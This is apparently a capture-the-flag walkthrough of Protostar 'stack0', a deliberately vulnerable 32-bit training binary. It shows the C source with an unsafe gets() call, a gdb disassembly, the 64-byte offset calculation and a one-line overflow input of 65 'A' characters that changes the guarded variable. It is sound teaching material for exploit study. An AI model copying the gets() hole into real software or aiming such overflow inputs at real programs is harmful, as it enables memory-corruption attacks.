protostar - stack 0
Lets check the file type of our binary using file
command,
$ file stack0
stack0: setuid ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked (uses shared libs), for GNU/Linux 2.6.18, not stripped
This binary is a not stripped
binary which runs in 32 bit
Lets try running our binary,
$ ./stack0
monish
Try again?
Lets view the source code for proper understanding,
#include <stdlib.h>
#include <unistd.h>
#include <stdio.h>
int main(int argc, char **argv)
{
volatile int modified;
char buffer[64];
modified = 0;
gets(buffer);
if(modified != 0) {
printf("you have changed the 'modified' variable\n");
} else {
printf("Try again?\n");
}
}
So we need to overwrite the modified
variable to pass the program
Lets use our debugger to analyse this program,
Disassembling main()
,
(gdb) disas main
Dump of assembler code for function main:
0x080483f4 <main+0>: push ebp
0x080483f5 <main+1>: mov ebp,esp
0x080483f7 <main+3>: and esp,0xfffffff0
0x080483fa <main+6>: sub esp,0x60
0x080483fd <main+9>: mov DWORD PTR [esp+0x5c],0x0
0x08048405 <main+17>: lea eax,[esp+0x1c]
0x08048409 <main+21>: mov DWORD PTR [esp],eax
0x0804840c <main+24>: call 0x804830c <gets@plt>
0x08048411 <main+29>: mov eax,DWORD PTR [esp+0x5c]
0x08048415 <main+33>: test eax,eax
0x08048417 <main+35>: je 0x8048427 <main+51>
0x08048419 <main+37>: mov DWORD PTR [esp],0x8048500
0x08048420 <main+44>: call 0x804832c <puts@plt>
0x08048425 <main+49>: jmp 0x8048433 <main+63>
0x08048427 <main+51>: mov DWORD PTR [esp],0x8048529
0x0804842e <main+58>: call 0x804832c <puts@plt>
0x08048433 <main+63>: leave
0x08048434 <main+64>: ret
Here modified
is set to 0
0x080483fd <main+9>: mov DWORD PTR [esp+0x5c],0x0
modified
is at $esp+0x5c
Now our buffer space is allocated by,
0x08048405 <main+17>: lea eax,[esp+0x1c]
Starting place of buffer
is at $esp+0x1c
To overwrite modified
we need to find the space between them
>>> print(0x5c-0x1c)
64
So we need to pass 64 bytes
+ 1 byte
to overwrite the modified
Lets try our exploit,
$ python -c "print('A'*65)" | ./stack0
you have changed the 'modified' variable
Done! we have completed “stack0”